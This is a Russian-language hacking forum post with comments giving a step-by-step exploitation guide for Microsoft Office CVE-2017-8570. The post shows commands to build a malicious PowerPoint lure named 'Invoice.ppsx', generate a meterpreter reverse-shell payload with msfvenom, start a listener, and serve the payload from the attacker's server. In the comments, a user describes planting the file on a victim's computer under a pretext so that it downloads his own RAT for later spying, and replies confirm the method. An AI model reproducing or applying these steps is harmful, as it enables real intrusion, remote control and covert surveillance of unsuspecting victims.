РАЗБОР Pentest

Уязвимость Microsoft Office CVE-2017-8570

kot-gor
kot-gor Red Team · 519 сообщений
Подписаться
13,7 тыс.
Всем привет. Сегодня разберем такую уязвимость как Microsoft Office CVE 2017 8570.

Данная уязвимость довольно свежая, позволяет получить доступ к удаленной машине используя специально подготовленный файл PowerPoint, более подробно о ней можете почитать по ссылке:

https://www.rapid7.com/db/vulnerabilities/msft-cve-2017-8570.

Использована она может быть на следующих версиях:
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2 (32-bit editions)
  • Microsoft Office 2010 Service Pack 2 (64-bit editions)
  • Microsoft Office 2013 RT Service Pack 1
  • Microsoft Office 2013 Service Pack 1 (32-bit editions)
  • Microsoft Office 2013 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)
На данный момент уязвимость устранена в текущих обновлениях, но, как мы знаем, что многие пренебрегают обновлениями, что нам конечно на руку.

И так поехали:

1. Заходим по ссылке https://github.com/tezukanice/Office8570 скачиваем, не забываем читать README.md , там будет рассмотрено три сценария атаки используя данную уязвимость. Мы в данной статье остановимся на первом сценарии.

2m.png


Вкратце:
- генерируем наш вредоносный PPSX файл,
- создаем полезную нагрузку и запускаем слушатель.
- запускаем сервер на 80 порту.​

Давайте непосредственно приступим к делу.

Создаем в директории «Office8570» новую папку и назовем ее «template», далее переносим файл template.ppsx в эту папку. Если этого не сделать то при генерировании PPSX файла выскочит ошибка.

3.png


1.Сейчас генерируем наш PPSX файл, пишем в терминале в одну строчку следующее:
Код:
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.0.104/logo.doc
Не забываем вместо моего ip ставить свой, если кто не знает как узнать свой ip, делается это командой ifconfig. У вас должен появится файл Invoice.ppsx.

рис4 .png


2. Создаем полезную нагрузку,где будет создан файл shell.exe в каталоге tmp, в моем случае это будет выглядеть следующим образом:
Код:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f exe > /tmp/shell.exe
Для создания полезной нагрузки можем использовать любой другой инструмент, не обязательно использовать msfvenom, главное перенести полезную нагрузку потом в каталог tmp.

Запускаем слушатель:
Код:
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.104; set LPORT 4444; run"
3.Далее в терминале пишем следующую строчку
Код:
python cve-2017-8570_toolkit.py -M exp -e http://192.168.0.104/shell.exe -l /tmp/shell.exe
по итогу, у нас запустится сервер на 80 порту.

Далее нам осталось впарить файл Invoice.ppsx , и как только его откроют ,с сервера погрузится наша полезная нагрузка.

Всем хорошего вечера и удачного пентеста!!!
 
Последнее редактирование:

Комментарии

24
ВСё то же самое..просто переносите свой билд в каталог tmp.но вам потом еще нужно будет поднимать права и прописывать в автозагрузку.
В том то и дело, что я пробовал так, и у меня ничего не запускается. Никаких прав и автозагрузки мне не нужно, мне достаточно чтобы билд скачался и запустился, я хочу просто сгенерировать файл презентации. и скинуть себе на флешку. Чтобы мне не приходилось сидеть под линуксом из запущеным слушателем в ожидании. Мне нужно чтобы я пришел с флешкой куда-то, под любым предлогом впарил ppsx файл на комп жертвы, и после запуска ppsx, мой билд скачался(по ссылке в предыдущем посте) и запустился. Потом я пришел домой, и под виндовсом через рат уже подключился и смотрю то что мне нужно.

Покажи на примере пожалуйста. Потому что я реально уже много вариантов перепробовал, и у меня не работает. Попробуй сгенерировать ты, так как ты советуешь мне, если будет работать, то покажешь как сделал ты, и в чем была моя ошибка. Но я же говорю, что мои попытки поменять местами shell.exe и putty.exe в дериктории tmp ни к чему не привели.
 
для начала посмотри поднят ли у тебя сервер на 80 порту.. в локал хосте по 80 порту у тебя должна находится твоя полезная нагрузка...там хоть картинку поставь , без разницы ...возможно антивирус блокирует на компе жертвы (сейчас этот метод палится всем что есть)..

---- Добавлено позже ----

а в целом у меня всё отлично работает..но с выключенным дефендором и антивирусом
 
Последнее редактирование:
для начала посмотри поднят ли у тебя сервер на 80 порту.. в локал хосте по 80 порту у тебя должна находится твоя полезная нагрузка...там хоть картинку поставь , без разницы ...возможно антивирус блокирует на компе жертвы (сейчас этот метод палится всем что есть)..

---- Добавлено позже ----

а в целом у меня всё отлично работает..но с выключенным дефендором и антивирусом

Смотри, ты говоришь чтобы посмотреть поднят ли сервер и лежит ли полезная нагрузка в локал хосте. Но я же говорю, что мне не нужно поднимать сервер. Все что мне нужно, чтобы файл ppsx после запуска скачал МОЙ файл exe, который находится по этому адресу jigyrda.com/123.exe (например), и запустил. И это все что мне нужно. Никаких серверов на линуксе мне поднимать не нужно, никаких слушателей запускать. А просто сгенерировать ppsx так чтобы он скачал мой exe и запустил, и всё. Сможешь подсказать как это сделать?
 
А если я хочю другую програмку подгрузить я вместо http://192.168.56.1/shell.exe указываю на свой хостинг. т.е. ссылку прямого типа.
 
Да.всё правильно.